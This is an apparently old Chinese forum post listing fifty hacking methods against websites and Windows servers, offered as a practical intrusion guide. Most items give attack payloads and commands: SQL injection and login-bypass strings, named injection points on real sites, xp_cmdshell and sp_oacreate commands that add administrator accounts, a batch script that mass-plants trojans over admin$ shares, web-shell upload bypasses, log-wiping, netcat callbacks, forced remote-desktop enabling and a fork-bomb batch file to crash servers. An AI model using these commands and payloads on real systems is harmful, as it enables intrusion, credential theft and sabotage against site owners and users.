|
|
現在網上的攻擊事件越來越多,黑客都是通過什麼方法來攻擊我們的呢?下面我們給大家總結了黑客入侵網路的五十種方法,讓大家做到有備無患。
1.網寬網路有限公司製作的網站基本都有注入漏洞 搜索網寬網路
2.搜索欄里輸入
關鍵字%'and 1=1 and '%'='
關鍵字%'and 1=2 and '%'='
比較不同處 可以作為注入的特徵字元
3.登陸框用戶名和密碼輸入'or'='or' 漏洞很老但是現在很是遍地都是
4.我們先到www.google.com底下搜索一下Co Net MIB Ver 1.0
密碼帳號都是 'or'='or'
5.掛馬代碼
6.http://www.wyyfk.com/24小時掛QQ工具
7.開啟regedt32的SAM的管理員許可權 檢查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理員和guest的F鍵值,如果一樣就是用被入侵過了,然後刪了guest帳號,對方可以用guest帳號使用administraeors的許可權,你也可以用這方法留住肉雞,這方法是簡單克隆,
net localgroup administrators還是可以看出Guest是管理員來
7.只要敢想,新浪也可入侵 注入點
http://igame.sina.com.cn/plaza/e ... iew.asp?event_id=59
微軟官方網站注入點
http://www.microsoft.com/library ... =iso-8859-1&qu=
8.ms05016攻擊工具用法 mshta.exe test.hta 文件名.後綴名 可以綁上QQ大盜木馬
9.有sa許可權sqlserver資料庫、並且能sql注入支持fso+asp的伺服器
SQL注入后,如何上傳木馬,
文章地址 http://hack123.home4u.china.com/0601.htm
10.QQ強制聊天代碼
http://wpa.qq.com/msgrd?V=1&Uin=對方的qq號&Site=ioshenmue&Menu=yes
使用方法:把代碼中的紅色的「********」星號換成你想與其聊天的QQ號后復 制到瀏覽器的地址欄處即可。無論他是否你的好友,你無須加他為好友就能給 他發QQ消息。
11. mybbs論壇cookie欺騙 後台備份馬
12.軟體instsrv.exe 把.exe文件做成系統服務來啟動 用來肉雞掛QQ等
用法: 安裝: instsrv.exe 服務名稱 路徑
卸載: instsrv.exe 服務名稱 REMOVE
13.以動網為例資料庫查找DV_LOG,在上面的查詢的欄位名里選l_content後面的關鍵字填上password2,找到的username2=%B7%E7%A4%CE%B0%D7%D2%C2&password2=01180017&username1=%B7%E7%A4%CE%B0%D7%D2%C2&Submit=%CC%ED+%BC%D3 password2=01180017就是他的登陸密碼
14.搜索的技巧 inurl:網址
15.啟航工作室WMS 5.0網站程序漏洞
在baidu 搜索Powered by: SailingStudio Website Manage System 5.0 (SP1)
利用動畫看http://soft.77169.com/62/20050530/6824.html
16.很多網站程序(比如華碩中文官方網站)上傳圖片時有可能在檢測文件的時候是 從左朝又進行檢測,也就是說,他會檢測文件是不是有.jpg,那麼我們要是把文件改成:ating.jpg.asp試試。。由於還是ASP結尾,所以木馬不會變~
17.天意商務系統網上依然有 有漏洞 網站具體的樣式http://www.wzgcc.org/
工具下載www.hack6.com
地址欄里,填上天意商務系統的網址就可以了,注意一定要是主頁面
18.SQL注入時工具---Internet選項---高級里找到顯示友好的錯誤信息勾去掉
不能注入時要第一時間想到%5c暴庫
19.這個dbinbd.asp文件插入後門的功能適用於文件名為.asp的所有access資料庫不是動網論壇也一樣可以使用的,後門隱蔽,幾乎發現不了
工具使用方法動畫和所有文件
http://www.anquanwu.com/bbs/printpage.asp?BoardID=2&ID=811
20.缺少xp_cmdshell時
嘗試恢復EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
假如恢復不成功,可以嘗試直接加用戶(針對開3389的)
declare @o int
exec sp_oacreate 'wscript.shell',@o out
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理員
21.批量種植木馬.bat
for /f %%i in (掃描地址.txt) do copy pc.exe %%i\admin$ 複製木馬到掃描的計算機當中
for /f %%i in (掃描地址.txt) do at %%i 09:50 pc.exe 在對方計算機上運行木馬的時間
掃描地址.txt里每個主機名一行 用\\開頭
22.搜索 Powered by Discuz!4.0.0RC3 開放頭像的可利用 工具地址www.hack6.com
23.DV7.1用還原數據功能 還原asa木馬
24.凡人網路購物系統V6.0 可以%5c暴庫
25.IPB2.0.2漏洞 構造語句
$qpid=1) and 1=2 union select 1,2,3,4,5,6,7,8,9,10,member_login_key,12,13,14,15,16,17,18,19,1 from ibf_members where id=1 /* 暴管理員密碼 想看動畫到黑基里找 IPB<= 2.0.3論壇注入工具 www.hack6.com有下載
26. 將工具傳到郵箱 在下載上右擊 複製快捷方式 擁有自己了的下載空間
27.北京沖QB要寬頻號跟綁定寬頻的后4位電話,當你掃出北京款待號的密碼必須是8位的密碼,而且開頭是6或8的才可以,因為北京的電話都是6根8開頭的而且都是8位的,北京的區名海淀 東城 西城 門頭溝 丰台 潮陽 宣武 通州 昌平,去http://cnc.qq.com/bbn/沖
28.搜索 企業網路辦公系統 添'or''=' 登陸 在個人郵箱 上傳asp木馬
29.本人原創 搜索"一點點星空驛站 留言本" 默認資料庫是gbmdb.mdb 很多網站用這個留言本 但是用搜索引擎搜不到 可以給大家在入寢時多個思路
30.在程序上傳shell過程中,程序不允許包含標記符號的內容的文件上傳,比如藍屏最小 的asp木馬,我們來把他的標籤換一下: 保存為.asp,程序照樣 執行.
31.目錄許可權設置變態的話可以用一些方法(比如serv-u溢出)將此web用戶提權 可訪問全站目錄掛馬
32.喜歡網頁掛馬的看看這篇總結文章吧
http://77169.com/News/hk/2005060611656.html
33.搜索"images/admin" 或".tw/images/admin" 可以找到些台灣的資料庫
34.IIS6 For Windows 2003 Enterprise Edition 如IIS發布目錄文件夾包含.asp后輟名.
將.asp后輟改為.jpg或其它的如.htm,也可以運行asp,但要在.asp文件夾下.
.cer 等後綴的文件夾下都可以運行任何後綴的asp木馬
35.telnet一台交換機 然後在telnet控制主機 控制主機留下的是交換機的IP
然後用#clear logg和#clear line vty *刪除日誌
36.搜索關鍵字:"Copyright 2003-2004 動易網路" 後面地址改成upfile_soft.asp 這樣的漏洞很多
37.bbsxp的漏洞總結 Powered by BBSxp 5.15/Licence blog.asp中的對id 的過濾不嚴的漏洞 拿到管理員的前後台密碼 工具:bbsxp完全版 cookies 欺騙 bbsxp 過濾了 asp 文件的上傳 所以我們這裡用 asa 來傳馬
38.學會總結入侵思路http://www.77169.com/News/hk/2005060811688.html
39.電腦壞了省去重新安裝系統的方法
純dos下執行,
xp:copy C:\WINDOWS\repair\*.*? 到?c:\windows\system32\config
2k: copy C:\winnt\repair\*.*? 到?c:\winnt\system32\config
40.一般人設置啊拉QQ大盜的時候發信和收信都是同一個信箱,因此當我的機子中了此木馬後沒有立即殺掉進程,而是用內存編輯工具打開它的進程,查找smtp字樣,就會找到它的信箱和密碼了。只對1.5以前的管用.
41.內網控制內網 用vidc 還要有一隻肉雞 動畫看黑基的
http://soft.77169.com/62/20050608/6878.html
42.有許多管理員用備份的日期做備份資料庫的名字
比如http://www.hack6.com/bbs/databackup/20050601.mdb
43.動網資料庫oldusername=%B5%F0%B7%C0&username2=%B5%F0%B7%C0&password2=19841202&adduser=%B5%F0%B7%C0&id=12&Submit=%B8%FC+%D0%C2
不知道用戶名(不是%B8%F0%B7%C0) 轉化這個用他本身的頁面
http://www.hack6.com/bbs/showerr.asp?BoardID=0&ErrCodes=10,11&action=%CC%EE%D0%B4%B5%C7%C2%BC%D0%C5%CF%A2
%CC%EE%D0%B4%B5%C7%C2%BC%D0%C5%CF%A2這句話意思是「填寫登錄信息」
那麼就把%CC%EE%D0%B4%B5%C7%C2%BC%D0%C5%CF%A2換成%B5%F0%B7%C0 可以看到用戶名
44.對付信息監控系統 木馬必須是加密的 如net user用不了就用net1 user等等 我是大連的 大連這邊主機用這方法好用 可以直接傳加密的馬 用用黑基tyrant的方法 上傳一個cmd的aspshall 用nc連接自己的nc監聽埠 在web目錄下寫個加ftp用戶的txt 本地43958用nc提交 ftp到伺服器加用戶
45.解決TCP/IP篩選 在註冊表裡有三處,分別是:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
分別用
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
命令來導出註冊表項
然後把三個文件里的EnableSecurityFilters"=dword:00000001,
改成EnableSecurityFilters"=dword:00000000 再將以上三個文件分別用
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 導入註冊表即可
46.使CHM木馬無法在本地運行木馬程序 將註冊表"HKEY_CURRENT_U
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004項的值由原來十進位的0改為十六進位的3。
47.開3389的5種方法
(1)打開記事本,編輯內容如下:
echo [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
編輯好后存為BAT文件,上傳至肉雞,執行。
(2) (對xp\2000都有效) 腳本文件 本地開3389 工具:rots1.05
下載地址:www.netsill.com/rots.zip
在命令行方式下使用windows自帶的腳本宿主程序cscript.exe調用腳本,例如:
c:\>cscript ROTS.vbs <目標IP> <用戶名> <密碼> [服務埠] [/r]
如果要對本地使用,IP地址為127.0.0.1或者一個點(用.表示),用戶名和密碼都為空(用 ""表示)。
(3)djshao正式版5.0
解壓djshao5.0.zip,用你的隨便什麼方法把把解壓出來的djxyx*.**e上傳到肉雞的c:\winnt\temp下,然後 進入c:\winnt\temp目錄執行djxyx*.**e解壓縮文件,然後再執行解壓縮出來的azzd.exe文件,等一會肉雞 會自動重啟!重啟後會出現終端服務
(4)下載DameWare NT Utilities 3.66.0.0 註冊版
地址www.netsill.com/dwmrcw36600.zip
安裝註冊完畢后輸入對方IP用戶名密碼,等待出現是否安裝的對話框點是。
複製啟動后出現對方桌面。
在對方桌面進入控制面版,點添加或刪除程序。進入後點添加/刪除windows組件,找到終端服務,點際進入 后在啟動終端服務上打上勾。確定自動提示重起,重起后OK
(5)大家最常用的 3389.exe 下載地址www.hack6.com 把程序上傳到肉雞運行后重啟既可
48.QQ上得到別人的IP
一般跟別人聊天 如果是對方先對你說話 那麼她的IP顯示出來的概率就大
當然如果是我們找對方 可以先跟她說發過去消息之後 然後關閉窗口等待她的回復
還可以用天網防火牆選擇上UDP數據保檢測,即可攔截到對方ip
49.掛馬js代碼document.write('');保存到js頁面里 可讓所有頁面掛馬
50.讓伺服器重啟
寫個bat死循環:
@echo off
:loop1
cls
start cmd.exe
goto loop1
保存成bat guset許可權就可以運行 運行后很快伺服器就會死機 管理員自然會去重啟。 |
|
狗仔卡
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
搶沙發
頂